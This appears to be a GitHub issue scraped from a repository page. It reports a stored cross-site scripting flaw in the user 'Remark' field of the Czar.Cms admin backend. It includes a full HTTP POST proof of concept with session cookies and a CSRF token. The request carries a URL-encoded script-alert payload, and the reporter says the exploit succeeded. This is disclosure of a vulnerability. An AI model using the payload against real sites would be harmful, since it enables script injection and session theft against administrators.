Czar.Cms icon indicating copy to clipboard operation
Czar.Cms copied to clipboard

Published 20 hours ago verified publisher icon yilezhu

Add users in the background - there is xss in the remarks

Open nolan124 opened this issue 2 years ago • 0 comments

Add users in the background - there is xss in the remarks poc ` POST /Manager/AddOrModify/ HTTP/1.1 Host: 192.168.3.129:10027 Content-Length: 141 Accept: application/json, text/javascript, /; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 X-CSRF-TOKEN-yilezhu: CfDJ8HxjCh0oOylDk40Utlg0kuVkHkyELbXkZ591U7-GfIexTnaoBJzXqAaXjoA5H3C6gvRNVVZEsvzH4kjo2ex7nqwNN0zp9AjetYdYquuFK7OiIvPLuLCjm4sSuQ-tFZQWY7sawRxuxp0hXS1vl2F2fEbDNZqWAkZswhhRnETzIfgvA0L2c1wlwu8Hd9iZzyK69g Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.3.129:10027 Referer: http://192.168.3.129:10027/Manager/AddOrModify/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: .AspNetCore.Antiforgery.WE9Ryc20IQg=CfDJ8HxjCh0oOylDk40Utlg0kuUFWVLtvNW_C4pGl8LD435wIbnnMrZdOHOVRm58Tf9ea-RLT8Cp1rFj-RWlZ5XrTw9-pVKvbqtZLLUaL1326gsyfJyfQ4k6KDwnwVkIpwADhj_KGa_UpcDu8IqL7EsVtWw; .AspNetCore.Session=CfDJ8HxjCh0oOylDk40Utlg0kuXb68MZjsW%2FxifhC6RHBoXE9qf6bZAULAztKWrxdQ9IBGV%2FMomSXYW%2BGJr9gVN1G67kZ5ZHUvzZTEMIYQoRouYf9upg6F4i%2BhutGrGde7h3SIdWEXSN5b50ouWrN9AG8MmS%2FGz8y0InZBJWSgEn5O55; .AspNetCore.Cookies=CfDJ8HxjCh0oOylDk40Utlg0kuW5c6KKu3Hv3_AeZn_Eqz8FiekY-PyIkH57GfSaUX3CuNVAmpSx5KYdBHFWTuuZ-4BQgxoxIX-oBg8oGsWBgJqNKg-5d6xyMsDYpqosZkkNHB18dkAC6C5lh94kPv7Wq3aWf-jFp_ZA5K71nfIvbrHehMSum9bKmVeg44omCGGAfG0YgEYBwT4gQIM-DpQ8ihzLTAJ_CQVOQdWa3FUhulnMO80mKlyNt315-by3Bu-JaP9xkCYxJuuIpqUP8BQbZ19jfrISdQWgPMpbdvHRhmEbzjX8Ch5Y8dVgNgZiyL2S6mNtmuszsosdCdJ39sThpNbVwOvZ-giceXwRRzHBSvj9JlLkxIRQliWExonSpQRZTGt0aSyGXuLEIplNn7cEvwuxOLb_MWsD5qSqhRm30XW5QYXB_kikRurj2XX18q4PN7ISmAyxutiFGyQVY9HbBEqQG92SPxPXP5-8ug6DAc7994R-XPDTkQTU9FTBG9O_6ddLFFqDVZpf6CS3byZDAkRL9N5-k7soot2QEDCiqGqz Connection: close

Id=&UserName=123aaaa&RoleId=1&NickName=12323a&Mobile=13322133321&Email=1%40xx.com&IsLock=false&Remark=%3Cscript%3Ealert(11111)%3C%2Fscript%3E ` image

then in background exploit xss success image

image

nolan124 avatar Jan 08 '23 05:01 nolan124